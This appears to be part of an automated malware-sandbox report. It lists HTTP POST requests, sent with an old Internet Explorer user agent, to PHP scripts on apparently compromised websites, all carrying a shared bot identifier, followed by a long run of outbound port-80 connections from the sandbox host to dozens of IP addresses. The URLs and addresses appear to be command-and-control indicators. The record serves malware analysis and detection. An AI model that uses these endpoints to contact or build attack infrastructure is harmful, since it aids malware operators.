User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?p=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://forwriteabouteverything.com/wp-includes/pomo/ap4.php?p=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ftpsecurityservices.com/wp-admin/images/ap2.php?d=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 166.62.12.1:80
Flows TCP192.168.1.1:1035 ➝ 23.229.142.166:80
Flows TCP192.168.1.1:1036 ➝ 107.180.1.233:80
Flows TCP192.168.1.1:1037 ➝ 192.254.189.83:80
Flows TCP192.168.1.1:1038 ➝ 23.229.143.32:80
Flows TCP192.168.1.1:1039 ➝ 66.33.213.135:80
Flows TCP192.168.1.1:1040 ➝ 184.168.26.1:80
Flows TCP192.168.1.1:1041 ➝ 166.62.28.84:80
Flows TCP192.168.1.1:1042 ➝ 107.180.4.133:80
Flows TCP192.168.1.1:1043 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1044 ➝ 50.63.90.1:80
Flows TCP192.168.1.1:1045 ➝ 68.178.254.208:80
Flows TCP192.168.1.1:1046 ➝ 66.36.163.207:80
Flows TCP192.168.1.1:1047 ➝ 103.21.58.231:80
Flows TCP192.168.1.1:1048 ➝ 23.229.183.231:80
Flows TCP192.168.1.1:1049 ➝ 52.88.9.255:80
Flows TCP192.168.1.1:1050 ➝ 52.88.9.255:80
Flows TCP192.168.1.1:1051 ➝ 192.232.249.212:80
Flows TCP192.168.1.1:1052 ➝ 46.252.201.1:80
Flows TCP192.168.1.1:1053 ➝ 50.62.245.1:80
Flows TCP192.168.1.1:1054 ➝ 50.63.202.57:80
Flows TCP192.168.1.1:1055 ➝ 186.202.153.84:80
Flows TCP192.168.1.1:1056 ➝ 173.201.1.1:80
Flows TCP192.168.1.1:1057 ➝ 157.7.144.5:80
Flows TCP192.168.1.1:1058 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1059 ➝ 85.92.75.157:80
Flows TCP192.168.1.1:1060 ➝ 74.124.204.146:80
Flows TCP192.168.1.1:1061 ➝ 107.180.44.125:80
Flows TCP192.168.1.1:1062 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1063 ➝ 217.174.149.3:80
Flows TCP192.168.1.1:1064 ➝ 95.110.202.149:80
Flows TCP192.168.1.1:1065 ➝ 173.254.28.111:80
Flows TCP192.168.1.1:1066 ➝ 50.62.160.231:80
Flows TCP192.168.1.1:1067 ➝ 74.124.204.146:80
Flows TCP192.168.1.1:1068 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1069 ➝ 184.168.25.1:80
Flows TCP192.168.1.1:1070 ➝ 184.168.221.44:80
Flows TCP192.168.1.1:1071 ➝ 182.50.135.128:80
Flows TCP192.168.1.1:1072 ➝ 182.50.134.1:80
Flows TCP192.168.1.1:1073 ➝ 68.178.254.208:80
Flows TCP192.168.1.1:1074 ➝ 107.180.4.26:80
Flows TCP192.168.1.1:1075 ➝ 50.63.95.1:80
Flows TCP192.168.1.1:1076 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1077 ➝ 97.74.215.85:80
Flows TCP192.168.1.1:1078 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1079 ➝ 50.63.42.1:80
Flows TCP192.168.1.1:1080 ➝ 23.229.209.230:80
Flows TCP192.168.1.1:1081 ➝ 192.232.249.212:80
Flows TCP192.168.1.1:1082 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1083 ➝ 107.180.2.132:80
Flows TCP192.168.1.1:1084 ➝ 107.180.26.90:80
Flows TCP192.168.1.1:1085 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1086 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1087 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1088 ➝ 166.62.12.1:80
Flows TCP192.168.1.1:1089 ➝ 23.229.142.166:80
Flows TCP192.168.1.1:1090 ➝ 107.180.1.233:80
Flows TCP192.168.1.1:1091 ➝ 192.254.189.83:80
Flows TCP192.168.1.1:1092 ➝ 23.229.143.32:80
Flows TCP192.168.1.1:1093 ➝ 66.33.213.135:80
Flows TCP192.168.1.1:1094 ➝ 184.168.26.1:80
Flows TCP192.168.1.1:1095 ➝ 166.62.28.84:80
Flows TCP192.168.1.1:1096 ➝ 107.180.4.133:80
Flows TCP192.168.1.1:1097 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1098 ➝ 50.63.90.1:80
Flows TCP192.168.1.1:1099 ➝ 68.178.254.208:80
Flows TCP192.168.1.1:1100 ➝ 66.36.163.207:80
Flows TCP192.168.1.1:1101 ➝ 103.21.58.231:80
Flows TCP192.168.1.1:1102 ➝ 23.229.183.231:80
Flows TCP192.168.1.1:1103 ➝ 52.88.9.255:80
Flows TCP192.168.1.1:1104 ➝ 52.88.9.255:80
Flows TCP192.168.1.1:1105 ➝ 192.232.249.212:80
Flows TCP192.168.1.1:1106 ➝ 46.252.201.1:80
Flows TCP192.168.1.1:1107 ➝ 50.62.245.1:80
Flows TCP192.168.1.1:1108 ➝ 50.63.202.57:80
Flows TCP192.168.1.1:1109 ➝ 186.202.153.84:80
Flows TCP192.168.1.1:1110 ➝ 173.201.1.1:80
Flows TCP192.168.1.1:1111 ➝ 157.7.144.5:80
Flows TCP192.168.1.1:1112 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1113 ➝ 85.92.75.157:80
Flows TCP192.168.1.1:1114 ➝ 74.124.204.146:80
Flows TCP192.168.1.1:1115 ➝ 107.180.44.125:80
Flows TCP192.168.1.1:1116 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1117 ➝ 217.174.149.3:80
Flows TCP192.168.1.1:1118 ➝ 95.110.202.149:80
Flows TCP192.168.1.1:1119 ➝ 173.254.28.111:80
Flows TCP192.168.1.1:1120 ➝ 50.62.160.231:80
Flows TCP192.168.1.1:1121 ➝ 74.124.204.146:80
Flows TCP192.168.1.1:1122 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1123 ➝ 184.168.25.1:80
Flows TCP192.168.1.1:1124 ➝ 184.168.221.44:80
Flows TCP192.168.1.1:1125 ➝ 182.50.135.128:80
Flows TCP192.168.1.1:1126 ➝ 182.50.134.1:80
Flows TCP192.168.1.1:1127 ➝ 68.178.254.208:80
Flows TCP192.168.1.1:1128 ➝ 107.180.4.26:80
Flows TCP192.168.1.1:1129 ➝ 50.63.95.1:80
Flows TCP192.168.1.1:1130 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1131 ➝ 97.74.215.85:80
Flows TCP192.168.1.1:1132 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1133 ➝ 50.63.42.1:80
Flows TCP192.168.1.1:1134 ➝ 23.229.209.230:80
Flows TCP192.168.1.1:1135 ➝ 192.232.249.212:80
Flows TCP192.168.1.1:1136 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1137 ➝ 107.180.2.132:80
Flows TCP192.168.1.1:1138 ➝ 107.180.26.90:80

Raw Pcap

Strings